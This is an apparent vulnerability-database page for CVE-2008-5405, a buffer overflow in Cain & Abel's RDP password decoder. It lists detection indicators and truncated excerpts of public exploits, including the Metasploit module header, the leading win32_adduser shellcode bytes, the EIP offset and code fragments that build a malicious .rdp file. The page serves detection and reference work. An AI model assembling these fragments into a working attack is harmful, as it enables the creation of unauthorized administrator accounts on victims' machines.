CVE-2008-5405
Published: 2008-12-10
Priority: P2 (62) · Severity: critical · CVSS 2.0 base score: 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 46.98% (98.7th percentile)
Stack-based buffer overflow in the RDP protocol password decoder in Cain & Abel 4.9.23 and 4.9.24, and possibly earlier, allows remote attackers to execute arbitrary code via an RDP file containing a long string.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oxid | cain_and_abel | — | — |
| oxid | cain_and_abel | — | — |
Detection & IOCs (extracted from sources)
Shellcode bytes (leading bytes of the win32_adduser payload used in the public exploit): \x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46\xcd\x10\x60
- The exploit overwrites EIP at offset 8206 with a return address, followed by the payload. A run of 8206 repeated bytes followed by a 4-byte return address in an .rdp file is a strong indicator of an exploitation attempt.
- The Metasploit module uses the AlphanumMixed encoder with bad characters \x00\x0a\x0d\x3c\x22\x3e\x3d, so the encoded shellcode in a malicious .rdp file will be mixed-case alphanumeric.
- The win32_adduser shellcode in exploit 7329 creates a local user account (USER=user, PASS=pass). Post-exploitation indicator: an unexpected local account named 'user' appearing after Cain processes an .rdp file.
- Return addresses are platform-specific; the three Metasploit targets cover Windows XP SP0/1/2 English and SP2 Spanish only. Other OS versions or service packs would need different return addresses.
- The vulnerability requires user interaction: the victim must open the crafted .rdp file via Cain's Tools -> Remote Desktop Password Decoder menu. It is not a remotely network-exploitable vector, even though the CVE description says "remote attackers".
No detection rules found.
Exploit-DB · 2010-11-24 · Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: cain_abel_4918_rdp.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cain & Abel %q{
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24
and below. An attacker must send the file to victim, and the victim must open
the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek ' ],
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '20
```
Exploit-DB · 2008-12-03 · Cain & Abel 4.9.23 - '.rdp' Local Buffer Overflow
---
```python
#exploit.py
print ""
print " !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""
# win32_adduser - PASS=pass EXITFUNC=seh USER=user Size=232
# Encoder=PexFnstenvSub http://metasploit.com
shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73
```
Exploit-DB · 2008-11-30 · Cain & Abel 4.9.24 - '.rdp' Local Stack Overflow
---
```perl
#!/usr/bin/perl
#
# Cain & Abel s.rdp");
print $rdp $overflow.$eip.$addr.$overflow2.$shellcode;
close($rdp);
# milw0rm.com [2008-11-30]
```
Exploit-DB · 2008-11-30 · Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)
---
```python
# exploit.py
##########################################################
# Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC
# (other versions may also affected)
# By:Encrypt3d.M!nd
# encrypt3d.blogspot.com
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder
##########################################################
#
# Description:
# When Using Remote Desktop Password Decoder in Cain and
# Importing ".rdp" file contains long Chars(ex:8250 chars)
# The Program Will crash.And The Following Happen:
#
# EAX:41414141 ECX:7C832648 EDX:41414142 EBX:00000000
# ESP:0012BCD4 EBP:0012BCD4 ESI:001F07A8 EDI:00000001
# EIP:7E43C201 USER32.7E43C201
#
# Access violation When Reading [41414141]
#
# And Also The Pointer to next SEH record and SE Handler
```
Metasploit · Cain and Abel RDP Buffer Overflow
This module exploits a stack-based buffer overflow in Cain & Abel v4.9.24 and below. An attacker must send the file to the victim, and the victim must open the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
No writeups or analysis indexed.
References
- http://osvdb.org/50342
- http://oxid.netsons.org/phpBB2/viewtopic.php?t=2750
- http://secunia.com/advisories/32794
- http://securityreason.com/securityalert/4703
- http://www.securityfocus.com/bid/32543
- http://www.vupen.com/english/advisories/2008/3286
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46940
- https://www.exploit-db.com/exploits/7297
- https://www.exploit-db.com/exploits/7309